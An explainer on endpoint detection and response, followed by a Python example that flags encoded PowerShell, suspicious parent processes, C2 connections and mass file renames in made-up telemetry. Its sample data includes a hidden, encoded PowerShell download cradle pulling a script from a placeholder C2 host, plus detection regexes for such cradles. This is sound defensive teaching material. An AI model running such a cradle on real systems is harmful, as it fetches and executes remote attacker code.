Endpoint detection is security monitoring on devices such as laptops, servers, and workstations to find suspicious behavior, malware activity, and signs of intrusion. It focuses on the endpoint itself, where attackers often run tools, create persistence, steal credentials, or launch ransomware.
This matters because many attacks leave evidence on the host before they are visible anywhere else: unusual process launches, encoded PowerShell command lines, file-encryption patterns, privilege escalation, or connections to known command-and-control infrastructure. Endpoint detection tools can alert analysts, isolate a device from the network, or preserve forensic data for investigation. In practice it is used alongside logs from VPNs, email, and servers to confirm whether a public claim of compromise reflects an actual intrusion or only pressure tactics. Good endpoint detection helps responders move from speculation to evidence-based action, including containment, credential resets, and recovery from clean backups.
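The host-side indicators listed above (encoded PowerShell, unusual process launches, file-encryption patterns, connections to known command-and-control addresses) are exactly what a detection pass over endpoint telemetry looks for. The following is an added example, not code from any product or from the original text: a small Python detector run over constructed sample events. Every name in it (the `Finding` type, the rule names, the `KNOWN_C2_IPS` indicator list, the host names and file paths) is hypothetical, and the "C2" addresses come from the documentation address ranges rather than any real infrastructure.

```python
"""Added example: a minimal detection pass over constructed endpoint telemetry."""
import base64
import re
from collections import Counter
from dataclasses import dataclass

# Hypothetical indicator list; these are documentation-range addresses, not real C2.
KNOWN_C2_IPS = {"198.51.100.23", "203.0.113.77"}

# Parents that rarely have a legitimate reason to spawn a shell or script host.
OFFICE_AND_BROWSER = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
# The flag must be followed by whitespace, so -ExecutionPolicy does not match.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_CRADLE = re.compile(r"(?i)Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b")

RENAME_THRESHOLD = 5  # renames to one new extension on one host before flagging mass encryption


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def detect(events):
    """Apply four host-centric rules to a list of event dicts and return Findings."""
    findings = []
    renames = Counter()  # (host, new extension) -> count of renames seen
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process":
            image = ev["image"].lower()
            parent = ev["parent"].lower()
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                detail = "encoded PowerShell"
                if DOWNLOAD_CRADLE.search(decoded):
                    detail += " containing a download cradle"
                findings.append(Finding(host, "encoded_powershell", f"{detail}: {decoded[:60]}"))
            if parent in OFFICE_AND_BROWSER and image in SHELLS:
                findings.append(Finding(host, "suspicious_parent", f"{parent} spawned {image}"))
        elif ev["type"] == "network" and ev["dst_ip"] in KNOWN_C2_IPS:
            findings.append(Finding(host, "c2_connection", f"{ev['image']} -> {ev['dst_ip']}"))
        elif ev["type"] == "file_rename":
            new_ext = ev["new_path"].rsplit(".", 1)[-1].lower()
            renames[(host, new_ext)] += 1
    # Ransomware signal: many files on one host renamed to the same new extension.
    for (host, ext), n in renames.items():
        if n >= RENAME_THRESHOLD:
            findings.append(Finding(host, "mass_rename", f"{n} files renamed to .{ext}"))
    return findings


def _b64_utf16(text: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build sample data)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: one benign PowerShell launch, one Word-spawned encoded one,
# one benign and one indicator-matching connection, and six renames on a file server.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')")},
    {"type": "process", "host": "ws-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"type": "network", "host": "ws-01", "image": "powershell.exe", "dst_ip": "198.51.100.23", "dst_port": 443},
    {"type": "network", "host": "ws-01", "image": "msedge.exe", "dst_ip": "192.0.2.10", "dst_port": 443},
] + [
    {"type": "file_rename", "host": "srv-02",
     "old_path": f"D:\\Shares\\Finance\\q{i}.xlsx", "new_path": f"D:\\Shares\\Finance\\q{i}.xlsx.locked"}
    for i in range(6)
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Each rule maps to one of the indicator classes the text names, and the findings carry the host so a responder can pivot to isolation or forensic collection on that device. A real deployment would read events from an EDR or Sysmon feed instead of `SAMPLE_EVENTS`, tune the rename threshold per environment, and keep the indicator set current.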